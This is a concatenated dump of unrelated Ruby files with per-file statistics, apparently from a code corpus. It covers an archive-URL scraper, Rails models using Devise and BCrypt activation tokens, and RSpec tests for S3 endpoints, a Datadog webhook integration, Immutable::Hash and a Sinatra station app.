  s.extra_rdoc_files = ['README.rdoc', 'CHANGELOG']
  s.homepage = %q{http://github.com/stffn/declarative_authorization}

  s.add_dependency('rails', '>= 4.0.0', '< 5.2.0')
  s.add_development_dependency('test-unit')
end
47.055556
249
0.672963
e21dbb2d161da6a9e444c58e4d7676f1b8979a0a
3,337
require "addressable/uri" require "uri" require_relative "../common/colorize" require_relative "../common/data" require_relative "../common/format" require_relative "../common/query" # href='*.Z' # href="*.Z" # href=*.Z PAGE_WITH_ARCHIVES_REGEXP = Regexp.new( " href[[:space:]]*=[[:space:]]* (?: ' ( [^']+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) ' | \" ( [^\"]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) \" | ( [^[:space:]>]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) [[:space:]>] ) ", Regexp::IGNORECASE | Regexp::MULTILINE | Regexp::EXTENDED ) .freeze # -r--r--r-- 1 257 7070 337967 Jul 29 1992 *.Z LISTING_WITH_ARCHIVES_REGEXP = Regexp.new( " ( [^[:space:]]+ #{ARCHIVE_POSTFIX_FOR_REGEXP} ) (?: [[:space:]] | \\Z ) ", Regexp::IGNORECASE | Regexp::MULTILINE | Regexp::EXTENDED ) .freeze def get_archive_urls_from_page_url(url) begin uri = URI url scheme = uri.scheme case scheme when "ftp" data, is_listing = get_content_or_listing_from_ftp uri regexp = is_listing ? LISTING_WITH_ARCHIVES_REGEXP : PAGE_WITH_ARCHIVES_REGEXP when "http", "https" data = get_http_content uri regexp = PAGE_WITH_ARCHIVES_REGEXP else raise StandardError, "unknown uri scheme: #{scheme}" end rescue QueryError => query_error warn query_error return [] rescue StandardError => error warn error return nil end data .scan(regexp) .flatten .compact .map do |archive_url| uri = URI Addressable::URI.parse(url).join(archive_url).to_s scheme = uri.scheme case scheme when "ftp", "http", "https" uri.to_s else raise StandardError, "unknown uri scheme: #{scheme}" end rescue StandardError => error warn error next nil end .compact end def get_archive_urls(page_urls) valid_page_urls = [] invalid_page_urls = [] archive_urls = [] page_urls .shuffle .each_with_index do |page_url, index| percent = format_percent index, page_urls.length warn "- #{percent}% checking page, url: #{page_url}" new_archive_urls = get_archive_urls_from_page_url page_url next if new_archive_urls.nil? if new_archive_urls.empty? invalid_page_urls << page_url page_text = "invalid" else valid_page_urls << page_url page_text = "valid".light_green end archive_text = colorize_length new_archive_urls.length warn "received #{archive_text} archive urls, page is #{page_text}" archive_urls.concat new_archive_urls end valid_page_urls = valid_page_urls.sort.uniq invalid_page_urls = invalid_page_urls.sort.uniq archive_urls = archive_urls.sort.uniq valid_page_text = colorize_length valid_page_urls.length invalid_page_text = colorize_length invalid_page_urls.length archive_text = colorize_length archive_urls.length warn \ "-- received #{archive_text} archive urls " \ "from #{valid_page_text} valid page urls, " \ "#{invalid_page_text} invalid page urls" [valid_page_urls, invalid_page_urls, archive_urls] end
22.70068
94
0.622415
bf7cc06d6f5732cf10648cfc6102c196c8d774af
1,066
{
  matrix_id: '784',
  name: 'nemeth20',
  group: 'Nemeth',
  description: 'Newton-Schultz iteration, Z_k+1=Z_k+(1/2)*(I-(Z_k)^2)*Z_k. This is Z_20',
  author: 'K. Nemeth',
  editor: 'T. Davis',
  date: '1999',
  kind: 'subsequent theoretical/quantum chemistry problem',
  problem_2D_or_3D: '0',
  num_rows: '9506',
  num_cols: '9506',
  nonzeros: '971870',
  num_explicit_zeros: '0',
  num_strongly_connected_components: '1',
  num_dmperm_blocks: '1',
  structural_full_rank: 'true',
  structural_rank: '9506',
  pattern_symmetry: '1.000',
  numeric_symmetry: '1.000',
  rb_type: 'real',
  structure: 'symmetric',
  cholesky_candidate: 'no',
  positive_definite: 'no',
  notes: 'next: Nemeth/nemeth21 first: Nemeth/nemeth01 ',
  norm: '9.993786e-01',
  min_singular_value: '4.525611e-01',
  condition_number: '2.208273e+00',
  svd_rank: '9506',
  sprank_minus_rank: '0',
  null_space_dimension: '0',
  full_numerical_rank: 'yes',
  image_files: 'nemeth20.png,nemeth20_svd.png,nemeth20_graph.gif,',
}
29.611111
91
0.64728
08105cd979cbc2d3a428204867e9324c87fdd410
807
ENV['RACK_ENV'] = 'test'

require("bundler/setup")
Bundler.require(:default, :test)
set(:root, Dir.pwd())

require('capybara/rspec')
Capybara.app = Sinatra::Application
set(:show_exceptions, false)

require('./app')
Dir[File.dirname(__FILE__) + '/../lib/*.rb'].each { |file| require file }

RSpec.configure do |config|
  config.after(:each) do
    User.all().each() do |store|
      store.destroy()
    end
  end
end

RSpec.configure do |config|
  config.after(:each) do
    Group.all().each() do |brand|
      brand.destroy()
    end
  end
end

RSpec.configure do |config|
  config.after(:each) do
    Service.all().each() do |brand|
      brand.destroy()
    end
  end
end

RSpec.configure do |config|
  config.after(:each) do
    Community.all().each() do |brand|
      brand.destroy()
    end
  end
end
17.933333
73
0.645601
d53b8630089e43249de4dae114ef7e5a6d542fc7
48
module CoinbaseCommerce
  VERSION = "0.8.6"
end
12
23
0.729167
b94191dc4dd7d9d632c8d4040e0af0129eb8d512
2,114
class Review < ApplicationRecord default_scope { order(created_at: :desc) } belongs_to :reviewee, class_name: "User" belongs_to :reviewer, class_name: "User" belongs_to :post attr_accessor :activation_token before_create :create_activation_digest validates :reviewer_id, presence: true validates :reviewee_id, presence: true # validates :satisfied, presence: true # validates :reviewee_review, presence: true # validates :comment, presence: true def user_name reviewee.name end def user reviewee end def user_id reviewee.id end def reviewer_name reviewer.name end def reviewer_up_votes reviewer.upvotes_size end def reviewer_down_votes reviewer.downvotes_size end # Sends activation email. def send_review_activation_email(reviewer, reviewee, post) UserMailer.review_activation(reviewer.id, reviewee.id, self.id, post.id, activation_token).deliver_later(wait_until: 1.minute.from_now) end # Returns the hash digest of the given string. def self.digest(string) cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST : BCrypt::Engine.cost BCrypt::Password.create(string, cost: cost) end # Returns a random token. def self.new_token SecureRandom.urlsafe_base64 end # Activates an account. def activate update_columns(activated: true, activated_at: Time.zone.now) end # returns true if the given token matches the digest (activation_digest) def authenticated?(attribute, token) digest = self.send("#{attribute}_digest") return false if digest.nil? BCrypt::Password.new(digest).is_password?(token) #renew the remember_digest with new password end def activation_expired? return self.activated_at < 7.days.ago if self.activated_at.present? return true end private def create_activation_digest self.activation_token = Review.new_token self.activation_digest = Review.digest(activation_token) end #creates and assigns the activation token and digest. end
27.454545
137
0.722327
9145b238628cfbfeb2afa92226c7dc7659e19e43
83
# desc "Explaining what the task does" # task :sober do # # Task goes here # end
16.6
38
0.662651
7aeec4dc0aa292ca52ddd631d5a54be1e2f2691d
1,001
#!/usr/bin/ruby

require 'livejournal/database'
require 'livejournal/entry'
require 'test/unit'

class TC_Database < Test::Unit::TestCase
  FILENAME = '/tmp/test.db'

  def setup
    @db = LiveJournal::Database.new(FILENAME, true)
  end

  def teardown
    @db.close
    File.delete FILENAME
  end

  def test_metas
    @db.username = 'foo'
    assert_equal(@db.username, 'foo')
  end

  def roundtrip e
    @db.store_entry e
    new_e = @db.get_entry e.itemid
    assert_equal(e, new_e)
  end

  def test_roundtrips
    e = LiveJournal::Entry.new
    e.itemid = 1
    e.anum = 2
    e.subject = 'subject here'
    e.event = 'event here'
    e.time = LiveJournal::coerce_gmt Time.now
    roundtrip e

    e = LiveJournal::Entry.new
    e.itemid = 1
    e.anum = 2
    e.subject = 'subject here'
    e.event = 'eventblah here'
    e.time = LiveJournal::coerce_gmt Time.now
    e.comments = :noemail
    e.preformatted = true
    e.security = :friends
    roundtrip e
  end
end

# vim: ts=2 sw=2 et :
18.2
51
0.643357
21d768f7c91a9a1eeb4d7aa75250762c2002c144
93
require 'simplecov'

SimpleCov.start do
  add_filter 'spec'
  add_group 'Libraries', 'lib'
end
18.6
30
0.752688
bb208394e78914c8002d7141e7d8301077ad2a38
992
# frozen_string_literal: true

require_relative '../spec_helper'

def suites
  JSON.parse(File.read(File.expand_path('../suite.json', __FILE__).strip))
end

module Aws
  module S3
    describe Client do
      suites.each_with_index do |suite, i|
        it "produces correct url pattern with configuration #{i}" do
          unless suite['ConfiguredAddressingStyle'] == 'default'
            path_style = true
          end
          client = Aws::S3::Client.new(
            stub_responses: true,
            region: suite['Region'],
            force_path_style: path_style,
            use_dualstack_endpoint: suite['UseDualstack'],
            use_accelerate_endpoint: suite['UseS3Accelerate'],
            s3_us_east_1_regional_endpoint: suite['S3RegionalEndpoint']
          )
          resp = client.list_objects(bucket: suite['Bucket'])
          expect(resp.context.http_request.endpoint.to_s)
            .to start_with(suite['ExpectedUri'])
        end
      end
    end
  end
end
30.060606
74
0.631048
1a7999ea6693bfc2d7a5327106af65d788caddc5
1,898
require "capybara_helper" describe "Stations", type: :system do it "overview page" do station = FactoryBot.create :station, name: "Marilu", strategy: :radiobox FactoryBot.create :track, station: station, track_info: FactoryBot.create(:track_info) visit "/" click_on "Stations" expect(page).to have_text "Stations Overview" expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["Marilu", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "1", "1", "Edit Show"] ]) end it "creates a new station" do FactoryBot.create :station, name: "Marilu", strategy: :radiobox visit "/" click_on "Stations" click_on "Edit" expect(page).to have_text "Editing Station" fill_in "Name", with: "fm42" click_on "Save" expect(page).to have_content "Station was successfully updated." expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["fm42", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "0", "0", "Edit Show"] ]) end it "edits a existin station" do visit "/" click_on "Stations" click_on "Add" expect(page).to have_text "New Station" fill_in "Name", with: "fm4" fill_in "Url", with: "https://planetrock.co.uk" fill_in "Playlist url", with: "https://onlineradiobox.com/uk/planetrock/playlist" select "radiobox", from: "Strategy" click_on "Save" expect(page).to have_content "Station was successfully created." expect(page).to have_table_with_exact_data([ ["Name", "Type", "Active", "Created", "Last update", "tracks last 24h", "all tracks", ""], ["fm4", "radiobox", "true", Time.current.strftime("%d.%m.%Y"), "", "0", "0", "Edit Show"] ]) end end
31.633333
99
0.630664
87fbc932d63c5088296485f366a16c23f90bd4af
1,271
require 'spec_helper'

describe Immutable::Hash do
  describe '#none?' do
    context 'when empty' do
      it 'with a block returns true' do
        H.empty.none? {}.should == true
      end

      it 'with no block returns true' do
        H.empty.none?.should == true
      end
    end

    context 'when not empty' do
      let(:hash) { H['A' => 'aye', 'B' => 'bee', 'C' => 'see', nil => 'NIL'] }

      context 'with a block' do
        [
          %w[A aye],
          %w[B bee],
          %w[C see],
          [nil, 'NIL'],
        ].each do |pair|
          it "returns false if the block ever returns true (#{pair.inspect})" do
            hash.none? { |key, value| key == pair.first && value == pair.last }.should == false
          end

          it 'returns true if the block always returns false' do
            hash.none? { |key, value| key == 'D' && value == 'dee' }.should == true
          end

          it 'stops iterating as soon as the block returns true' do
            yielded = []
            hash.none? { |k,v| yielded << k; true }
            yielded.size.should == 1
          end
        end
      end

      context 'with no block' do
        it 'returns false' do
          hash.none?.should == false
        end
      end
    end
  end
end
25.938776
95
0.497246
e2749ab1bc11c6b6cc70eda0347f2c5fc2aba9bf
5,668
# frozen_string_literal: true

require 'securerandom'
require 'spec_helper'

RSpec.describe Integrations::Datadog do
  let_it_be(:project) { create(:project) }
  let_it_be(:pipeline) { create(:ci_pipeline, project: project) }
  let_it_be(:build) { create(:ci_build, project: project) }

  let(:active) { true }
  let(:dd_site) { 'datadoghq.com' }
  let(:default_url) { 'https://webhooks-http-intake.logs.datadoghq.com/api/v2/webhook' }
  let(:api_url) { '' }
  let(:api_key) { SecureRandom.hex(32) }
  let(:dd_env) { 'ci' }
  let(:dd_service) { 'awesome-gitlab' }

  let(:expected_hook_url) { default_url + "?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}" }

  let(:instance) do
    described_class.new(
      active: active,
      project: project,
      datadog_site: dd_site,
      api_url: api_url,
      api_key: api_key,
      datadog_env: dd_env,
      datadog_service: dd_service
    )
  end

  let(:saved_instance) do
    instance.save!
    instance
  end

  let(:pipeline_data) { Gitlab::DataBuilder::Pipeline.build(pipeline) }
  let(:build_data) { Gitlab::DataBuilder::Build.build(build) }

  it_behaves_like Integrations::HasWebHook do
    let(:integration) { instance }
    let(:hook_url) { "#{described_class::URL_TEMPLATE % { datadog_domain: dd_site }}?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}" }
  end

  describe 'validations' do
    subject { instance }

    context 'when service is active' do
      let(:active) { true }

      it { is_expected.to validate_presence_of(:api_key) }
      it { is_expected.to allow_value(api_key).for(:api_key) }
      it { is_expected.not_to allow_value('87dab2403c9d462 87aec4d9214edb1e').for(:api_key) }
      it { is_expected.not_to allow_value('................................').for(:api_key) }

      context 'when selecting site' do
        let(:dd_site) { 'datadoghq.com' }
        let(:api_url) { '' }

        it { is_expected.to validate_presence_of(:datadog_site) }
        it { is_expected.not_to validate_presence_of(:api_url) }
        it { is_expected.not_to allow_value('datadog hq.com').for(:datadog_site) }
      end

      context 'with custom api_url' do
        let(:dd_site) { '' }
        let(:api_url) { 'https://webhooks-http-intake.logs.datad0g.com/api/v2/webhook' }

        it { is_expected.not_to validate_presence_of(:datadog_site) }
        it { is_expected.to validate_presence_of(:api_url) }
        it { is_expected.to allow_value(api_url).for(:api_url) }
        it { is_expected.not_to allow_value('example.com').for(:api_url) }
      end

      context 'when missing site and api_url' do
        let(:dd_site) { '' }
        let(:api_url) { '' }

        it { is_expected.not_to be_valid }
        it { is_expected.to validate_presence_of(:datadog_site) }
        it { is_expected.to validate_presence_of(:api_url) }
      end

      context 'when providing both site and api_url' do
        let(:dd_site) { 'datadoghq.com' }
        let(:api_url) { default_url }

        it { is_expected.not_to allow_value('datadog hq.com').for(:datadog_site) }
        it { is_expected.not_to allow_value('example.com').for(:api_url) }
      end
    end

    context 'when integration is not active' do
      let(:active) { false }

      it { is_expected.to be_valid }
      it { is_expected.not_to validate_presence_of(:api_key) }
    end
  end

  describe '#hook_url' do
    subject { instance.hook_url }

    context 'with standard site URL' do
      it { is_expected.to eq(expected_hook_url) }
    end

    context 'with custom URL' do
      let(:api_url) { 'https://webhooks-http-intake.logs.datad0g.com/api/v2/webhook' }

      it { is_expected.to eq(api_url + "?dd-api-key=#{api_key}&env=#{dd_env}&service=#{dd_service}") }

      context 'blank' do
        let(:api_url) { '' }

        it { is_expected.to eq(expected_hook_url) }
      end
    end

    context 'without optional params' do
      let(:dd_service) { '' }
      let(:dd_env) { '' }

      it { is_expected.to eq(default_url + "?dd-api-key=#{api_key}") }
    end
  end

  describe '#api_keys_url' do
    subject { instance.api_keys_url }

    it { is_expected.to eq("https://app.#{dd_site}/account/settings#api") }

    context 'with unset datadog_site' do
      let(:dd_site) { '' }

      it { is_expected.to eq("https://docs.datadoghq.com/account_management/api-app-keys/") }
    end
  end

  describe '#test' do
    context 'when request is successful' do
      subject { saved_instance.test(pipeline_data) }

      before do
        stub_request(:post, expected_hook_url).to_return(body: 'OK')
      end

      it { is_expected.to eq({ success: true, result: 'OK' }) }
    end

    context 'when request fails' do
      subject { saved_instance.test(pipeline_data) }

      before do
        stub_request(:post, expected_hook_url).to_return(body: 'CRASH!!!', status: 500)
      end

      it { is_expected.to eq({ success: false, result: 'CRASH!!!' }) }
    end
  end

  describe '#execute' do
    before do
      stub_request(:post, expected_hook_url)
      saved_instance.execute(data)
    end

    context 'with pipeline data' do
      let(:data) { pipeline_data }
      let(:expected_headers) do
        { WebHookService::GITLAB_EVENT_HEADER => 'Pipeline Hook' }
      end

      it { expect(a_request(:post, expected_hook_url).with(headers: expected_headers)).to have_been_made }
    end

    context 'with job data' do
      let(:data) { build_data }
      let(:expected_headers) do
        { WebHookService::GITLAB_EVENT_HEADER => 'Job Hook' }
      end

      it { expect(a_request(:post, expected_hook_url).with(headers: expected_headers)).to have_been_made }
    end
  end
end
30.473118
145
0.642202
bfabbbbafb14c4684bb46d3d2cc39375e23bee46
594
class User < ApplicationRecord
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable, :trackable and :omniauthable
  devise :database_authenticatable, :registerable,
         :recoverable, :rememberable, :validatable

  # Each user has their own diaries.
  has_many :diaries, dependent: :destroy
  has_many :genres, dependent: :destroy
  has_many :likes, dependent: :destroy
  has_many :parises, dependent: :destroy
  has_many :liked_parises, through: :likes, source: :parise

  def already_liked?(parise)
    self.likes.exists?(parise_id: parise.id)
  end
end
31.263158
71
0.747475